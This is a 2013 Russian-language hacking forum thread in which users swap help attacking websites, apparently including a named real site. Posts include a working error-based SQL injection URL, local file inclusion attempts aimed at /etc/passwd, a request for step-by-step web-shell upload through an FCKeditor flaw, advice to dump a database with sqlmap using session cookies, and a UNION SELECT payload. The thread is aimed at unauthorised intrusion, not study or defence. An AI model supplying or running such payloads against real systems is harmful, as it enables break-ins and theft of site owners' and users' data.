Ваши вопросы по уязвимостям.

11.11.2013, 20:06

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

Цитата:

Сообщение от Unknowhacker

http://www.aquaprima.ru/article_show.php?art_id=199+order+by+1+--+ Невозможно подобрать кол-во столбцов.

http://www.aquaprima.ru/article_show.php?art_id=199+or+1+group+by+concat%2 8%28select+version%28%29%29,0x00,floor%28rand%280% 29*2%29%29having+min%280%29+or+1--+

𝕏 Twitter Reddit Telegram Копировать ссылку

13.11.2013, 21:46

sfinxs15

Новичок

Регистрация: 16.05.2013

Сообщений: 9

С нами: 6838166

Репутация: 0

есть уязвимость FCK editor Arbitary File upload но когда открываю страницу на которой уязвимост там ничего нету. А Acunetix пишет что загрузил тестовый текст . Можете плз пошагово написать как залить шелл?

13.11.2013, 21:59

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Цитата:

Сообщение от sfinxs15

ссылку пошлите

13.11.2013, 22:58

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от sfinxs15

Может вам эта тема поможет разобраться /threadnav314734-1-10-fckeditor.html

14.11.2013, 01:50

ishenko

Новичок

Регистрация: 18.08.2013

Сообщений: 3

С нами: 6702806

Репутация: 0

Здравствуйте.

Вроде локал инклуд но не могу проинклудить...

Запрос

&language=ru"

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/ru&quot;/common.php) [user.include]: failed to open stream: No such file or directory

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/ru&quot;/common.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language/ru"/common.php couldn't be opened.

language=ru../../../../../etc/passwd%00

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/passwd) [user.include]: failed to open stream: No such file or directory

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language/passwd/common.php couldn't be opened.

language=ru../../../../../etc/passwd////кучу слешей/////

чистая страниц

language=ru../../../etc/passwd/%00

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/) [user.include]: failed to open stream: Success

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language//common.php couldn't be opened.

вывести не выходит не как...

помогите советом!

или тут не чего не зделаеш?

и еще вопрос -есть скуль инжект на сайте но надо авторизоваться чтобы его использовать .есть ли прога, скрипт которая логинится к сайту и потом дампит базу используя скуль инжект ? руками долго очень перебирать база большеватая)

14.11.2013, 11:37

-=Cerberus=-

Познавший АНТИЧАТ

Регистрация: 29.04.2012

Сообщений: 1,266

С нами: 7388246

Репутация: 391

ishenko

просто авторизируйся на сайте, залезь в настройки кукисов и посмотри, что там сайт установил.

потом используй их в SQLMAP параметр --cookie="тут через ; записываются куки"

теперь можешь крутить как авторизированный пользователь

14.11.2013, 23:10

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

есть уязвимый на скулю скрипт, типа такого

$login = $_GET['login'];

SELECT id, user_name FROM users WHERE user_login = '$login'

ковычки слешируются, как составить любой запрос на выборку данных?

#10

14.11.2013, 23:43

YaBtr

Постоянный

Регистрация: 30.05.2012

Сообщений: 600

С нами: 7343606

Репутация: 652

Цитата:

Сообщение от qaz

есть уязвимый на скулю скрипт, типа такого
$login = $_GET['login'];
SELECT id, user_name FROM users WHERE user_login = '$login'
ковычки слешируются, как составить любой запрос на выборку данных?

Цитата:

Сообщение от None

SELECT id, text FROM `news` WHERE user_login =
'\' UNION SELECT 1, concat_ws(0x3a,column1,column2) from table_name; --';

____

Внести депозит

Депозит создан

Вывести депозит